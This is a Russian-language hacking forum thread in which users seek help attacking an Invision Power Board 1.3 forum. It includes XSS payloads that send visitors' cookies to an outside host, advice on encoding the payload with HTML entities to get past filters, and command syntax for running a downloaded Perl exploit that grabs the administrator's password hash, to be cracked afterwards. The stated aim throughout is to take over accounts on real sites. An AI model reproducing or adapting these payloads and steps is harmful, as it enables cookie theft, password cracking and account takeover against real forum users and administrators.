Нужна поиощь есть форум

http://forum.низя ссылки.ru

Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.

На нем я использовал


[E*MAIL][U*RL=wj`=`][/U*RL][/E*MAIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie)`

Дыру закрыли

То ест теперь видя этот XSS Непроисходит никаких действий то есть подпись такой же становится как содержимое XSS

Помогите зашифровать его или другой способ!!

Пробовал через картинку! (Вродь картинку поставил но Hash пароля не пришол) За ранее thank's

Попробуй зашифровать некоторые фрагменты сплойта тут:
_http://www.h4cky0u.org/encrypt/index.php
в кодировку HTML Entities

ТЫ не пробывал Этот (http://rapidshare.de/files/21359678/1.3_final.rar.html) эксплоит

Как использовать сплойт на forum.test.ru ID юзера 123
perl 1.pl test.ru /forum/ 123 0

Так?

Нашол другой XSS

Можно ли его вставиить в картинку ??

wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie);

да зачем тебе с XSS париться. Вот паренёк дал сплойт. Запускай вводи типо C:\bin\perl.exe C:\file.pl http://lol.ru forum/ 1 0. И всё хэш админа твой. Теперь в руки passwords pro и ты поимел админа аккаунт.

Ладно ЗАКРЫЛИ!

Непрошол exploit